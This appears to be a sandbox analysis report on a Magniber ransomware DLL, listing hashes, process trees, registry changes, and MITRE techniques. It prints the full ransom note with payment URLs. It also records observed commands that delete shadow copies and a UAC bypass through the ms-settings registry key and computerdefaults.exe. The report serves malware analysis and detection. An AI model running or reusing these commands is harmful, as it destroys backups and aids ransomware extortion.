magniber | 896a23da24d13f598955ac6416a311816bf0d6a3d4ab41165d9a4cf6fd8c4433

Analysis

max time kernel
235s
max time network
204s
platform
windows11_x64
resource
win11
submitted
22-08-2021 13:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

896a23da24d13f598955ac6416a311816bf0d6a3d4ab41165d9a4cf6fd8c4433.dll
Size

38KB
MD5

3ead684ebe967074e0f49db375727514
SHA1

cc15ed7972a282fd1dc8da75ef89da0aa215156e
SHA256

896a23da24d13f598955ac6416a311816bf0d6a3d4ab41165d9a4cf6fd8c4433
SHA512

921393d667d1924af9f5ad8f2f2824aa3a1fe534ff178b94ef76bd857eea0a50e549c8517b51ecc2394dc3b97c4286c7c6d57dc99e6bbc51e43537c32b1b4e5e

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Documents\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://3e7454b8ee1492a0b0leaxiqtl.iizpmw37xqqwef5363j2l7nmcerqgconfa76ztt6i5uww2qj3muz3bad.onion/leaxiqtl Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://3e7454b8ee1492a0b0leaxiqtl.sadhour.space/leaxiqtl http://3e7454b8ee1492a0b0leaxiqtl.warbill.casa/leaxiqtl http://3e7454b8ee1492a0b0leaxiqtl.ballcan.xyz/leaxiqtl http://3e7454b8ee1492a0b0leaxiqtl.realbar.club/leaxiqtl Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://3e7454b8ee1492a0b0leaxiqtl.iizpmw37xqqwef5363j2l7nmcerqgconfa76ztt6i5uww2qj3muz3bad.onion/leaxiqtl

http://3e7454b8ee1492a0b0leaxiqtl.sadhour.space/leaxiqtl

http://3e7454b8ee1492a0b0leaxiqtl.warbill.casa/leaxiqtl

http://3e7454b8ee1492a0b0leaxiqtl.ballcan.xyz/leaxiqtl

http://3e7454b8ee1492a0b0leaxiqtl.realbar.club/leaxiqtl

Signatures

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 5 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.exevssadmin.exevssadmin.exevssadmin.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2380	4816	cmd.exe	29
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2372	4816	cmd.exe	29
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2444	4816	vssadmin.exe	29
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	916	4816	vssadmin.exe	29
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3736	4816	vssadmin.exe	29

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Interacts with shadow copies 2 TTPs 3 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exe

pid	Process
3736	vssadmin.exe
2444	vssadmin.exe
916	vssadmin.exe

Modifies data under HKEY_USERS 43 IoCs

Processes:

sihclient.exesvchost.exe

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	sihclient.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	sihclient.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	sihclient.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	sihclient.exe

Modifies registry class 8 IoCs

Processes:

rundll32.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\ms-settings\shell\open\command	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	rundll32.exe
Key created	\Registry\User\S-1-5-21-257790753-2419383948-818201544-1000_Classes\ms-settings\shell\open\command	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\ms-settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\ms-settings\shell	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\ms-settings\shell\open	rundll32.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

rundll32.exe

pid	Process
4608	rundll32.exe
4608	rundll32.exe

Suspicious behavior: MapViewOfSection 14 IoCs

Processes:

rundll32.exe

pid	Process
4608	rundll32.exe
4608	rundll32.exe
4608	rundll32.exe
4608	rundll32.exe
4608	rundll32.exe
4608	rundll32.exe
4608	rundll32.exe
4608	rundll32.exe
4608	rundll32.exe
4608	rundll32.exe
4608	rundll32.exe
4608	rundll32.exe
4608	rundll32.exe
4608	rundll32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

wmic.exeWMIC.exeWMIC.exe

description	pid	Process
Token: SeIncreaseQuotaPrivilege	3156	wmic.exe
Token: SeSecurityPrivilege	3156	wmic.exe
Token: SeTakeOwnershipPrivilege	3156	wmic.exe
Token: SeLoadDriverPrivilege	3156	wmic.exe
Token: SeSystemProfilePrivilege	3156	wmic.exe
Token: SeSystemtimePrivilege	3156	wmic.exe
Token: SeProfSingleProcessPrivilege	3156	wmic.exe
Token: SeIncBasePriorityPrivilege	3156	wmic.exe
Token: SeCreatePagefilePrivilege	3156	wmic.exe
Token: SeBackupPrivilege	3156	wmic.exe
Token: SeRestorePrivilege	3156	wmic.exe
Token: SeShutdownPrivilege	3156	wmic.exe
Token: SeDebugPrivilege	3156	wmic.exe
Token: SeSystemEnvironmentPrivilege	3156	wmic.exe
Token: SeRemoteShutdownPrivilege	3156	wmic.exe
Token: SeUndockPrivilege	3156	wmic.exe
Token: SeManageVolumePrivilege	3156	wmic.exe
Token: 33	3156	wmic.exe
Token: 34	3156	wmic.exe
Token: 35	3156	wmic.exe
Token: 36	3156	wmic.exe
Token: SeIncreaseQuotaPrivilege	1492	WMIC.exe
Token: SeSecurityPrivilege	1492	WMIC.exe
Token: SeTakeOwnershipPrivilege	1492	WMIC.exe
Token: SeLoadDriverPrivilege	1492	WMIC.exe
Token: SeSystemProfilePrivilege	1492	WMIC.exe
Token: SeSystemtimePrivilege	1492	WMIC.exe
Token: SeProfSingleProcessPrivilege	1492	WMIC.exe
Token: SeIncBasePriorityPrivilege	1492	WMIC.exe
Token: SeCreatePagefilePrivilege	1492	WMIC.exe
Token: SeBackupPrivilege	1492	WMIC.exe
Token: SeRestorePrivilege	1492	WMIC.exe
Token: SeShutdownPrivilege	1492	WMIC.exe
Token: SeDebugPrivilege	1492	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1492	WMIC.exe
Token: SeRemoteShutdownPrivilege	1492	WMIC.exe
Token: SeUndockPrivilege	1492	WMIC.exe
Token: SeManageVolumePrivilege	1492	WMIC.exe
Token: 33	1492	WMIC.exe
Token: 34	1492	WMIC.exe
Token: 35	1492	WMIC.exe
Token: 36	1492	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1520	WMIC.exe
Token: SeSecurityPrivilege	1520	WMIC.exe
Token: SeTakeOwnershipPrivilege	1520	WMIC.exe
Token: SeLoadDriverPrivilege	1520	WMIC.exe
Token: SeSystemProfilePrivilege	1520	WMIC.exe
Token: SeSystemtimePrivilege	1520	WMIC.exe
Token: SeProfSingleProcessPrivilege	1520	WMIC.exe
Token: SeIncBasePriorityPrivilege	1520	WMIC.exe
Token: SeCreatePagefilePrivilege	1520	WMIC.exe
Token: SeBackupPrivilege	1520	WMIC.exe
Token: SeRestorePrivilege	1520	WMIC.exe
Token: SeShutdownPrivilege	1520	WMIC.exe
Token: SeDebugPrivilege	1520	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1520	WMIC.exe
Token: SeRemoteShutdownPrivilege	1520	WMIC.exe
Token: SeUndockPrivilege	1520	WMIC.exe
Token: SeManageVolumePrivilege	1520	WMIC.exe
Token: 33	1520	WMIC.exe
Token: 34	1520	WMIC.exe
Token: 35	1520	WMIC.exe
Token: 36	1520	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3156	wmic.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

rundll32.execmd.execmd.execmd.execmd.exeComputerDefaults.exeComputerDefaults.exe

description	pid	Process	procid_target
PID 4608 wrote to memory of 3156	4608	rundll32.exe	91
PID 4608 wrote to memory of 3156	4608	rundll32.exe	91
PID 4608 wrote to memory of 3104	4608	rundll32.exe	92
PID 4608 wrote to memory of 3104	4608	rundll32.exe	92
PID 4608 wrote to memory of 908	4608	rundll32.exe	94
PID 4608 wrote to memory of 908	4608	rundll32.exe	94
PID 908 wrote to memory of 1492	908	cmd.exe	97
PID 908 wrote to memory of 1492	908	cmd.exe	97
PID 3104 wrote to memory of 1520	3104	cmd.exe	98
PID 3104 wrote to memory of 1520	3104	cmd.exe	98
PID 2372 wrote to memory of 1640	2372	cmd.exe	105
PID 2372 wrote to memory of 1640	2372	cmd.exe	105
PID 2380 wrote to memory of 4524	2380	cmd.exe	107
PID 2380 wrote to memory of 4524	2380	cmd.exe	107
PID 1640 wrote to memory of 3488	1640	ComputerDefaults.exe	109
PID 1640 wrote to memory of 3488	1640	ComputerDefaults.exe	109
PID 4524 wrote to memory of 4032	4524	ComputerDefaults.exe	110
PID 4524 wrote to memory of 4032	4524	ComputerDefaults.exe	110

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\896a23da24d13f598955ac6416a311816bf0d6a3d4ab41165d9a4cf6fd8c4433.dll,#1
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4608
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3156
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3104
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1520
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:908
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1492

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv sjuMneG/lkSK2C7c/HduvQ.0.2
1⤵
- Modifies data under HKEY_USERS
PID:4496

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2380
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4524
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4032

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2372
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1640
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3488

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2444

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1688

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:916

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3736

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
- Modifies data under HKEY_USERS
PID:2004

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:2116

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/908-159-0x0000000000000000-mapping.dmp

Download
memory/1492-160-0x0000000000000000-mapping.dmp

Download
memory/1520-161-0x0000000000000000-mapping.dmp

Download
memory/1640-162-0x0000000000000000-mapping.dmp

Download
memory/2004-167-0x000001E88DD60000-0x000001E88DD70000-memory.dmp

Filesize
64KB

Download
memory/2004-168-0x000001E88DDE0000-0x000001E88DDF0000-memory.dmp

Filesize
64KB

Download
memory/2004-175-0x000001E88E0C0000-0x000001E88E0C1000-memory.dmp

Filesize
4KB

Download
memory/2004-174-0x000001E88E1E0000-0x000001E88E1E4000-memory.dmp

Filesize
16KB

Download
memory/2004-173-0x000001E88E1E0000-0x000001E88E1E1000-memory.dmp

Filesize
4KB

Download
memory/2004-172-0x000001E88E1F0000-0x000001E88E1F4000-memory.dmp

Filesize
16KB

Download
memory/2004-171-0x000001E890670000-0x000001E890671000-memory.dmp

Filesize
4KB

Download
memory/2004-170-0x000001E8906B0000-0x000001E8906B4000-memory.dmp

Filesize
16KB

Download
memory/2004-169-0x000001E88E1C0000-0x000001E88E1C4000-memory.dmp

Filesize
16KB

Download
memory/3104-158-0x0000000000000000-mapping.dmp

Download
memory/3156-157-0x0000000000000000-mapping.dmp

Download
memory/3488-165-0x0000000000000000-mapping.dmp

Download
memory/4032-166-0x0000000000000000-mapping.dmp

Download
memory/4524-163-0x0000000000000000-mapping.dmp

Download
memory/4608-147-0x000001F34FD30000-0x000001F34FD31000-memory.dmp

Filesize
4KB

Download
memory/4608-164-0x000001F355B00000-0x000001F355B01000-memory.dmp

Filesize
4KB

Download
memory/4608-148-0x000001F34FD40000-0x000001F34FD41000-memory.dmp

Filesize
4KB

Download
memory/4608-146-0x000001F34FF40000-0x000001F350353000-memory.dmp

Filesize
4.1MB

Download
memory/4608-149-0x000001F34FD50000-0x000001F34FD51000-memory.dmp

Filesize
4KB

Download
memory/4608-150-0x000001F350360000-0x000001F350361000-memory.dmp

Filesize
4KB

Download
memory/4608-151-0x000001F350370000-0x000001F350371000-memory.dmp

Filesize
4KB

Download
memory/4608-155-0x000001F3503F0000-0x000001F3503F1000-memory.dmp

Filesize
4KB

Download
memory/4608-156-0x000001F353FF0000-0x000001F353FF5000-memory.dmp

Filesize
20KB

Download
memory/4608-154-0x000001F3503E0000-0x000001F3503E1000-memory.dmp

Filesize
4KB

Download
memory/4608-153-0x000001F3503C0000-0x000001F3503C1000-memory.dmp

Filesize
4KB

Download
memory/4608-152-0x000001F350380000-0x000001F350381000-memory.dmp

Filesize
4KB

Download